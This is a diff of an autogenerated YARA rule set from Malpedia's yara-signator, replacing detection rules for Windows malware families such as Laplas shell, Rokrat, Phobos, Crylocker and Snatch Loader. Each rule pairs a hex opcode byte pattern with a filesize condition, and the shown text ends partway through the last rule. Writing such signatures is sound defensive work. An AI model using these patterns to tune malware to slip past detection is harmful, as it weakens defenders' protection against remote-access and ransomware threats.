+		$sequence_8 = { 8b7508 8d4dec 6a00 8d55fc 51 }
+		$sequence_9 = { 33c0 8dbdb2fcffff 668995b0fcffff f3ab }
+		$sequence_10 = { 56 e8???????? 8bf8 83c408 85ff 7422 66891f }
+		$sequence_11 = { 5d 9d 5d 8b4dfc 51 }
+		$sequence_12 = { 50 8b4508 51 50 52 }
+		$sequence_13 = { e8???????? 83c410 8b4d08 6a00 68???????? }
+		$sequence_14 = { ff15???????? b940000000 33c0 8dbdfcfeffff }
+		$sequence_15 = { 8d741202 56 e8???????? 8bd0 83c404 85d2 8955f8 }
 
 	condition:
-		7 of them and filesize < 918528
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Laplas_Shell_Auto : FILE
+rule MALPEDIA_Win_Rustonotto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9c75f717-3a83-5505-a36a-1bce6df358ef"
+		id = "c96a83b8-aab4-55d7-a6bc-2f4705409146"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laplas_shell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.laplas_shell_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustonotto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rustonotto_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "651ff3d6bd8dabc0c16e2a61ceeb9a40f1d04f00168f1b0feb2a3661a16c588d"
+		logic_hash = "1a2f2499fd9c35d46eb281cf2189d5af496ab41ea2f40681381bfb3d9321a241"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107450,32 +107853,32 @@ rule MALPEDIA_Win_Laplas_Shell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb6825c324000 308618504000 8b4f10 8b5f14 0fb69618504000 3bcb }
-		$sequence_1 = { f7f1 0fb6825c324000 308618504000 8b4f10 8b5f14 0fb69618504000 3bcb }
-		$sequence_2 = { 8bc8 85c9 7504 ffd3 }
-		$sequence_3 = { c745fcffffffff 8b95ecfbffff 8b1d???????? 8b3d???????? }
-		$sequence_4 = { 89b594e6ffff 89b590e6ffff ff15???????? 85c0 7555 56 }
-		$sequence_5 = { 55 8bec 6aff 68???????? 64a100000000 50 b8ac190000 }
-		$sequence_6 = { 668985cafbffff 8d85c8fbffff 6a10 50 }
-		$sequence_7 = { 0f57c0 c78558e6ffff44000000 6a00 50 }
-		$sequence_8 = { ba???????? 50 8b0d???????? e8???????? }
-		$sequence_9 = { c745fc00000000 83bdecfbffff08 8d85d8fbffff 51 0f4385d8fbffff 8d8d58e6ffff }
+		$sequence_0 = { e8???????? 4889fa 84c0 0f84befdffff 488b0d???????? 488b4138 4885c0 }
+		$sequence_1 = { e8???????? 4983c4f9 488d8528010000 0f1f4000 4c8b30 450fb7aed2030000 498d742401 }
+		$sequence_2 = { eb02 31c0 66897d08 6689750a 488945f8 488d05a4751800 48894500 }
+		$sequence_3 = { eb0f b908000000 ba18000000 e8???????? 0f0b 90 4889542410 }
+		$sequence_4 = { 84c0 0f85d8feffff c6470101 e9???????? c685c700000000 e8???????? 84c0 }
+		$sequence_5 = { 740f 488d4d60 488b5550 4c8b4558 ff5020 90 4883c430 }
+		$sequence_6 = { e8???????? 0fb64520 3c03 751f 4183bf1801000001 0f858d000000 66c7060305 }
+		$sequence_7 = { e8???????? 8b8580040000 83f802 7432 83f803 0f84ba1d0000 a801 }
+		$sequence_8 = { 747b 8b514c 448b8990000000 4101d1 b801000000 7058 0f88f4010000 }
+		$sequence_9 = { c6858f04000001 c6858e04000000 8b8578040000 88858d040000 c6858c04000001 c6858b04000001 488d0d2f2a1000 }
 
 	condition:
-		7 of them and filesize < 59392
+		7 of them and filesize < 5989376
 }
-rule MALPEDIA_Win_Zedhou_Auto : FILE
+rule MALPEDIA_Win_Reaver_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "671058cb-44d0-5a2d-a903-c2aaa9e6edab"
+		id = "7725038c-885d-586e-9f95-5e06e196979a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zedhou_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.reaver_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "e746dfbb5d54339f68149693ef0514b3aa092790791cb02e6ab7c27b77b04068"
+		logic_hash = "83dafe6f8435f2ac84b6d9a74f3f9ba4ae0b3ddc0578ba5a08e90d4a03423ef1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107489,32 +107892,32 @@ rule MALPEDIA_Win_Zedhou_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03c8 8d954cfdffff 51 8d8550fcffff 52 50 68???????? }
-		$sequence_1 = { 50 0f80d8000000 51 52 e8???????? ffd7 8b85d4feffff }
-		$sequence_2 = { 68???????? ff15???????? 8bd0 8d8d70ffffff ff15???????? 50 8d956cffffff }
-		$sequence_3 = { 8b55a0 52 ff15???????? 8bd0 8d4d98 ff15???????? 50 }
-		$sequence_4 = { 6a00 51 50 ff35???????? ff15???????? 85c0 0f8c0b1a0000 }
-		$sequence_5 = { 8b04c5fc201822 8b7824 8b450c 85ff 0f847c340000 8b08 3b0f }
-		$sequence_6 = { ebe5 55 8bec 83ec18 53 56 57 }
-		$sequence_7 = { 8bcf e8???????? 8bf0 8bcb ff760c ff7608 e8???????? }
-		$sequence_8 = { 8d45d4 50 6a02 ff15???????? 83c40c 8d4dc0 51 }
-		$sequence_9 = { ffb610060000 81c610060000 8bc8 e8???????? ff36 832700 }
+		$sequence_0 = { 3d14050000 7504 33c0 c9 c3 }
+		$sequence_1 = { 7453 8d45f4 50 ff7508 6a00 ff15???????? }
+		$sequence_2 = { ff15???????? 85c0 7440 8b45f4 6a00 }
+		$sequence_3 = { ff15???????? 85c0 7453 8d45f4 }
+		$sequence_4 = { 50 ff15???????? 85c0 7453 8d45f4 50 ff7508 }
+		$sequence_5 = { ff15???????? 85c0 740d ff15???????? 3d14050000 7504 33c0 }
+		$sequence_6 = { 85c0 7453 8d45f4 50 ff7508 }
+		$sequence_7 = { 50 ff7508 6a00 ff15???????? 85c0 7440 }
+		$sequence_8 = { 6a00 ff15???????? 85c0 7440 8b45f4 6a00 }
+		$sequence_9 = { 50 c6467430 e8???????? 83c634 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Moontag_Auto : FILE
+rule MALPEDIA_Win_Crylocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cd77d4b0-0d98-5f5e-a57c-397ee34a65ee"
+		id = "8c49832e-3a15-5c26-a16b-f08cf4de197b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moontag"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moontag_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crylocker_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "8b060f50d5b5253ee18a9ffafa5845b2d3ee94dd99bd63bfd885c3444be1c8ca"
+		logic_hash = "9984a5545190dc600307a66e2e0bae93c274e609548786d31df4138b67fc5f5d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107528,38 +107931,32 @@ rule MALPEDIA_Win_Moontag_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4833c4 4889842430040000 488bd9 498d7b10 e8???????? 48897c2428 }
-		$sequence_1 = { 4885d2 480f4415???????? 483b15???????? 480f4405???????? 488905???????? c3 4885c9 }
-		$sequence_2 = { 4881ec60010000 488b05???????? 4833c4 48894550 488d4c2440 }
-		$sequence_3 = { 4d8be6 482bea 4d2be7 4d3bf7 7343 }
-		$sequence_4 = { 48c74424680f000000 c644245000 483bd9 0f82c0010000 482bd9 49c7c0ffffffff 493bd8 }
-		$sequence_5 = { 4883c420 5f c3 488bca e8???????? 488bf8 4885c0 }
-		$sequence_6 = { 488b36 4885f6 758a e9???????? 48837e3800 }
-		$sequence_7 = { c3 48833a00 7508 488b4208 49894008 }
-		$sequence_8 = { 03c1 68???????? 50 ffd3 83c40c 85c0 }
-		$sequence_9 = { 033d???????? 837d8400 0f4e3d???????? 83c734 }
-		$sequence_10 = { 03c1 3bf8 0f42f8 33c9 8bc7 83c001 56 }
-		$sequence_11 = { 014e08 b801000000 5f 5e 5b 8b4c2458 }
-		$sequence_12 = { 03c1 50 898570ecffff 8d8574ecffff }
-		$sequence_13 = { 03c2 3bf8 0f838f010000 8b0d???????? }
-		$sequence_14 = { 03c1 8b0d???????? a3???????? 3bc1 }
-		$sequence_15 = { 03421c 03c6 3bc8 760c }
+		$sequence_0 = { e8???????? 8d542408 68c5090000 52 e8???????? 8d442410 68???????? }
+		$sequence_1 = { ff15???????? 6afe e8???????? 83c404 5f 5e }
+		$sequence_2 = { 56 8da42400000000 8b44241c 8bf7 }
+		$sequence_3 = { 53 33ff ff15???????? 8bf0 3bf3 762e 3bfb }
+		$sequence_4 = { 8b7c242c 8b7704 50 e8???????? 8b4c2440 8bd8 51 }
+		$sequence_5 = { 8d442430 50 e8???????? 8d4c2434 68???????? 51 e8???????? }
+		$sequence_6 = { 50 50 8b44244c 50 6a00 6a00 56 }
+		$sequence_7 = { 50 894608 e8???????? 83c414 eb76 }
+		$sequence_8 = { 81c4cc000000 c3 5f 5e 5d b8fdffffff 5b }
+		$sequence_9 = { e8???????? 8d4c2408 6aff 51 e8???????? 8d542410 6a02 }
 
 	condition:
-		7 of them and filesize < 203776
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Artfulpie_Auto : FILE
+rule MALPEDIA_Win_Slave_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de5450b6-b95f-5bac-b0a9-b9c5fd386b22"
+		id = "9b0051d5-869a-52df-9d63-5531f0ea1bc8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.artfulpie_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slave_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "6beac333cee4f67e44a4d36d19350c582ab6bfc4c8f39d10f4335fab88933e77"
+		logic_hash = "523de3cfcbf6b6abf4a7273f5bce657ee9b1b72d0e892b1b3170df330ecf9a83"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107573,32 +107970,32 @@ rule MALPEDIA_Win_Artfulpie_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 0f8527010000 0f1f4000 8b430c 85c0 0f8418010000 }
-		$sequence_1 = { c745fc00000000 85c0 7406 50 e8???????? 8b4df4 b801000000 }
-		$sequence_2 = { 8db8b44b4100 57 ff15???????? ff0d???????? 83ef18 }
-		$sequence_3 = { 894de0 8b049d984e4100 0fb6440828 83e001 }
-		$sequence_4 = { 50 ffd2 85c0 7477 8b46fc 57 }
-		$sequence_5 = { c745ec00000000 50 8d45ec c745e404000000 50 }
-		$sequence_6 = { 85c0 0f84af000000 6a04 6800100000 }
-		$sequence_7 = { 8b3e 8b4630 48 f7d0 }
-		$sequence_8 = { 6af6 ff15???????? 8b04bd984e4100 834c0318ff 33c0 }
-		$sequence_9 = { f00fc118 4b 7515 8b45fc 817848f8444100 7409 }
+		$sequence_0 = { e9???????? 837df400 0f84f7250000 b80a000000 66894706 8a4704 24c3 }
+		$sequence_1 = { 0c10 888694030000 eb8d 817b0800000040 0f85ea020000 8a9694030000 8a5c240e }
+		$sequence_2 = { 813e6f563412 7406 5e 33c0 5b 5d c3 }
+		$sequence_3 = { 833d????????00 c705????????00000000 740a b9???????? e8???????? 833d????????00 c705????????00000000 }
+		$sequence_4 = { 3d00000001 0f8456030000 3d00000002 0f859a240000 }
+		$sequence_5 = { 837f7401 894de8 7620 83bf8400000000 7417 8b8780000000 0345f4 }
+		$sequence_6 = { 8bc8 83c408 3bd9 750b }
+		$sequence_7 = { 83c40c 028e08010000 888e08010000 80f9ff 730c 0fb6c1 }
+		$sequence_8 = { 7307 0fb6c2 2bc8 eb02 33c9 0fb6c2 68???????? }
+		$sequence_9 = { ff15???????? 5f 5e c3 837e1800 7445 90 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 532480
 }
-rule MALPEDIA_Win_Isspace_Auto : FILE
+rule MALPEDIA_Win_Phobos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e2eec2f1-7baf-5dcc-a6aa-a2a11e65c5fc"
+		id = "6caf5a5b-e4a8-5ad7-ac96-0781f61cb33b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.isspace_auto.yar#L1-L103"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phobos_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "c1331a8a4f2f7f8169497cb9d4ae59c19406daa94f505a8ed56551a7b1886f8a"
+		logic_hash = "0813fe2e377724ce620e3c3620ed6e847086eab6c4f49515372897489c1a64d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107612,30 +108009,32 @@ rule MALPEDIA_Win_Isspace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a23 eb04 6a00 6a2b 68???????? 6a00 }
-		$sequence_1 = { 6800200300 a3???????? e8???????? 6800200300 }
-		$sequence_2 = { 33c5 50 8d45f0 64a300000000 8965e8 c745fc00000000 ff15???????? }
-		$sequence_3 = { eb19 6a00 6a1c eb0a 6a00 6a23 }
-		$sequence_4 = { 6a00 68???????? 68???????? 68???????? 53 ff15???????? 8bf0 }
-		$sequence_5 = { 50 50 6a03 6a02 ff15???????? 894604 }
-		$sequence_6 = { e8???????? 6800010000 8d8600010000 6a00 }
-		$sequence_7 = { 6a00 6a00 6800010000 53 6aff }
+		$sequence_0 = { 4f ff75fc e8???????? 59 8bc7 5f 5e }
+		$sequence_1 = { 6a0c 5b 53 8d442430 56 50 e8???????? }
+		$sequence_2 = { 7446 8b06 85c0 7440 8b0f 894e04 8b4f04 }
+		$sequence_3 = { 33db 56 57 33c0 895c2428 8d7c242c ab }
+		$sequence_4 = { 8bc6 8d3c08 8d8fb2000000 894df4 83c118 2bc8 81c100000400 }
+		$sequence_5 = { 5b c9 c3 56 6a1c }
+		$sequence_6 = { 83c002 eb02 8bc7 8bc8 56 8d7102 }
+		$sequence_7 = { 68ff000000 ff15???????? cc 55 8bec 8b4508 a3???????? }
+		$sequence_8 = { 0f8452010000 3bf7 7420 8d44243c 50 ff15???????? 50 }
+		$sequence_9 = { ff7708 8d442430 ff7704 ff37 50 56 e8???????? }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Salgorea_Auto : FILE
+rule MALPEDIA_Win_Carrotbat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24c723a2-add3-5c98-ac68-d74df04ec748"
+		id = "9e3c15b1-53c0-536f-b748-485d961b1513"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.salgorea_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.carrotbat_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "269f1f65813d46929a9206777195f8973f6aec01fe1e29b4790465e302c7f726"
+		logic_hash = "bfaec56400fafcaf85efd0fb6650770c8db082e08e8b7c0c5f56e8a5a426d6b1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107649,38 +108048,32 @@ rule MALPEDIA_Win_Salgorea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 893424 57 a1???????? 33c5 50 }
-		$sequence_1 = { 81e1ab000000 8b4c2414 f7d3 8b5c2418 53 9d }
-		$sequence_2 = { 66b9ad00 66f7e1 2bcb 80ef1f 59 }
-		$sequence_3 = { e8???????? 8b4510 2bfb 3bc7 0f8302000000 8bf8 3bf1 }
-		$sequence_4 = { 53 52 8d9c10f47e0000 6699 66c1e303 f6d1 }
-		$sequence_5 = { 8d6424fc 8d6424d0 9c 51 f6d1 9c }
-		$sequence_6 = { 80e6ee f8 f6d1 52 40 f7d3 8b5c2404 }
-		$sequence_7 = { 41 6681c1db00 8b4c2410 66c1e804 8b44240c }
-		$sequence_8 = { a1???????? 8945cc 8d45cc 3930 }
-		$sequence_9 = { 8d943a9979825a 8b7df4 c1c61e 33fe }
-		$sequence_10 = { 8d9432dcbc1b8f 8b75fc 0b75f8 8b7dfc }
-		$sequence_11 = { 8d943a9979825a 8b7df0 337dfc 8bf2 }
-		$sequence_12 = { 8d942498030000 89542428 8b531c 894c2434 }
-		$sequence_13 = { 8d942490000000 e8???????? 8b03 ff7030 }
-		$sequence_14 = { 8d9432a1ebd96e 8b75e0 3375cc 8955ec }
-		$sequence_15 = { 8d942490000000 e8???????? 85c0 7403 83cfff 8bc7 85ff }
+		$sequence_0 = { ff742424 c22800 c744241402000000 66f7d7 9c 89742414 0fcf }
+		$sequence_1 = { 0f84b9000000 8975e0 8b04bd20ee4000 0500080000 3bf0 0f8396000000 }
+		$sequence_2 = { 0f88d7feffff d2df 660fa5cf 5f 660fbaf30b 6681c61cd0 6681cef437 }
+		$sequence_3 = { e8???????? 33cd ff3424 0fbed9 8b5c240c 9c c60424ba }
+		$sequence_4 = { 8bff 56 57 33f6 bf???????? 833cf5a4d5400001 }
+		$sequence_5 = { 7353 8bc1 c1f805 8bf1 83e61f 8d3c8520ee4000 }
+		$sequence_6 = { 7524 a1???????? a3???????? a1???????? c705????????46444000 8935???????? a3???????? }
+		$sequence_7 = { 80e17f 3008 8b06 8bc8 c1f905 8b0c8d20ee4000 83e01f }
+		$sequence_8 = { 3b0d???????? 7353 8bc1 c1f805 8bf1 83e61f 8d3c8520ee4000 }
+		$sequence_9 = { 5f 03d1 5e c6840201ed400000 5b 5d }
 
 	condition:
-		7 of them and filesize < 2007040
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Winos_Auto : FILE
+rule MALPEDIA_Win_Rokrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab76e8bd-21bc-5539-b1fb-f47fdb274949"
+		id = "72ccb458-56ca-5321-9a37-7df4cd9fbcb3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.winos_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rokrat_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "e8eeb814a2c5b4ab9f10ee5708c1f0bfd3c156bc0fa60e8429c570c21e8f598c"
+		logic_hash = "5cd57f30b8bc2958324b2df203589daea09f2ea7985ac5d6acd0baa6db2468f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107694,32 +108087,38 @@ rule MALPEDIA_Win_Winos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66890c70 5e 8bc7 5f 5b 5d c20800 }
-		$sequence_1 = { eb0d 8d95bcfbffff 52 ff15???????? 8b85bcfbffff b906000000 663bc8 }
-		$sequence_2 = { 8d8de0fcffff 57 51 e8???????? 8b1d???????? }
-		$sequence_3 = { 83c40c 899c2460040000 33db 8d4c243c 51 89bc246c040000 }
-		$sequence_4 = { 2bd6 c1fa02 899530feffff 3bdf 7563 8bc3 }
-		$sequence_5 = { 8d4db8 50 8b853cffffff 50 }
-		$sequence_6 = { 8b442418 53 52 6a03 6a00 56 }
-		$sequence_7 = { c70009000000 e8???????? ebda 8bc3 c1f805 8d3c8540310310 8bf3 }
-		$sequence_8 = { 5d c3 55 8bec 8b4e10 }
-		$sequence_9 = { db45cc d84dc8 e8???????? 8b7dbc 8bf0 8945c4 6a4c }
+		$sequence_0 = { 50 e8???????? 6a04 33c0 }
+		$sequence_1 = { 668945c0 e8???????? c645fc03 8b45bc }
+		$sequence_2 = { 50 e8???????? 6a10 33c0 }
+		$sequence_3 = { 50 e8???????? 8d8e0c010000 8d4550 3bc8 }
+		$sequence_4 = { 0fb7c1 50 0fb74208 c1e910 51 50 0fb74212 }
+		$sequence_5 = { 50 ff15???????? e8???????? 40 }
+		$sequence_6 = { 50 e8???????? 6a18 33c0 }
+		$sequence_7 = { 68???????? e8???????? 837e1408 7204 8b06 eb02 8bc6 }
+		$sequence_8 = { 50 e8???????? 8d8edc000000 8d4520 }
+		$sequence_9 = { ff15???????? 50 e8???????? 59 6a64 }
+		$sequence_10 = { 897dfc e8???????? 68???????? 8d4dd8 e8???????? }
+		$sequence_11 = { 89442410 7e34 8d9b00000000 56 }
+		$sequence_12 = { 89442410 807c244400 7558 85db 7454 68d3010000 }
+		$sequence_13 = { 89442410 80f925 0f859d030000 3808 }
+		$sequence_14 = { 89442410 7c7c 8b7758 8b9f8c000000 81c630010000 }
+		$sequence_15 = { 89442410 7e19 68110b0000 68???????? }
 
 	condition:
-		7 of them and filesize < 457728
+		7 of them and filesize < 2932736
 }
-rule MALPEDIA_Win_Former_First_Rat_Auto : FILE
+rule MALPEDIA_Win_Snatch_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b32c8876-3cb4-5a83-afbc-8273b6710cbb"
+		id = "e84bc4db-d72c-55c7-8127-5b70bf9d85b1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.former_first_rat_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snatch_loader_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "993e92398130145e5edd81dd2e97cc96804b675ca01f408cd00440763a5fee35"
+		logic_hash = "71f941ef8f08c99c9d42e26dfa505e9884dda28bb1bd06c93b12ee312c92bc07"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107733,38 +108132,38 @@ rule MALPEDIA_Win_Former_First_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 898dd4feffff c785e0feffff02000000 899decfeffff 899d04ffffff 8d5001 8a08 40 }
-		$sequence_1 = { 53 68???????? e8???????? 83c408 eb08 8bd8 899d08efffff }
-		$sequence_2 = { e8???????? 83c404 c744242800100000 6800100000 e8???????? 83c404 89442438 }
-		$sequence_3 = { 7505 e8???????? 8b15???????? a1???????? 8b0d???????? 8995c8eeffff 8b15???????? }
-		$sequence_4 = { 83c40c 33c0 6803010000 8d8df8feffff }
-		$sequence_5 = { c785d8feffff00000100 c7850cffffff00000000 89b5f8feffff 0f8455010000 8da42400000000 a1???????? 8b9508ffffff }
-		$sequence_6 = { c745e400040000 837d1400 8b4ddc 8d55e4 8d0433 7415 6810040000 }
-		$sequence_7 = { 83c404 89442468 3bc3 750d 68???????? }
-		$sequence_8 = { 413bc6 0f848d010000 488d542440 488d4c2450 ff15???????? }
-		$sequence_9 = { 488d8c24a0000000 e8???????? 4d85f6 751d }
-		$sequence_10 = { e8???????? eb7a 4983f8fe 7605 }
-		$sequence_11 = { 4885f6 7456 488b4b08 4885c9 7444 }
-		$sequence_12 = { 48c783900000000f000000 c6437800 48837b6010 7209 488b4b48 }
-		$sequence_13 = { 48894720 488d0498 48894728 b001 488b9c24a0000000 }
-		$sequence_14 = { 488d542420 e8???????? 90 48837c244008 7275 }
-		$sequence_15 = { 488d942490020000 488d4c2440 e8???????? 90 }
+		$sequence_0 = { 895dfc e8???????? 8bf0 85f6 744b 33c0 66894606 }
+		$sequence_1 = { eb0e 8d4dfc 51 8d4df4 51 56 }
+		$sequence_2 = { 7505 8b45fc eb0d 53 53 }
+		$sequence_3 = { 57 8bfa 85c0 751d }
+		$sequence_4 = { 8b7dfc eb04 ffd0 8bf8 a1???????? }
+		$sequence_5 = { 8bc8 e8???????? a3???????? 85c0 7403 57 }
+		$sequence_6 = { 8bf8 a1???????? 85c0 7522 6a02 59 }
+		$sequence_7 = { 32c3 43 8802 42 }
+		$sequence_8 = { 76d8 33c0 48 5a 59 5f 5e }
+		$sequence_9 = { 59 5b 5a c9 c20c00 55 8bec }
+		$sequence_10 = { 8bec 83c4f8 53 56 57 51 52 }
+		$sequence_11 = { 0bc0 7454 394508 734f ff7510 }
+		$sequence_12 = { 33d2 33c9 8a0431 0ac0 741f }
+		$sequence_13 = { 3b45fc 773b 8b750c 8b7d10 037508 8bde }
+		$sequence_14 = { 741f 3a0439 7514 41 3b4df8 72ee 8bc2 }
+		$sequence_15 = { 57 56 8b36 56 8b33 33c0 48 }
 
 	condition:
-		7 of them and filesize < 626688
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Dircrypt_Auto : FILE
+rule MALPEDIA_Win_Supernova_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9519422-995e-5f4b-95b5-a3519aa7df7b"
+		id = "b0d23010-e706-5a6c-87f1-b10df99d0461"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dircrypt_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.supernova_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "97e8d29d80833d84634b7be7e527266210c621226e2be34c9aa4ca8405333cc4"
+		logic_hash = "3eb1ef4641d5ab988a67e433660b28cc5e0a8f3de783c5473bb118a467afaed4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107778,32 +108177,32 @@ rule MALPEDIA_Win_Dircrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 6a00 e8???????? 05d6070000 50 }
-		$sequence_1 = { e8???????? 03f0 8d45dc 50 e8???????? }
-		$sequence_2 = { e8???????? 05d3070000 50 6a01 }
-		$sequence_3 = { 833d????????00 751a 68???????? e8???????? 05d2070000 50 e8???????? }
-		$sequence_4 = { 751a 68???????? e8???????? 05d2070000 50 }
-		$sequence_5 = { 833d????????00 7514 c705????????01000000 e8???????? }
-		$sequence_6 = { c705????????01000000 e8???????? e8???????? 833d????????00 7514 }
-		$sequence_7 = { 6801000080 e8???????? e8???????? e8???????? e8???????? }
-		$sequence_8 = { 05d2070000 50 e8???????? a3???????? 6a13 68???????? }
-		$sequence_9 = { 833d????????00 7536 c705????????01000000 e8???????? }
+		$sequence_0 = { 1107 17 91 1f50 3339 1107 }
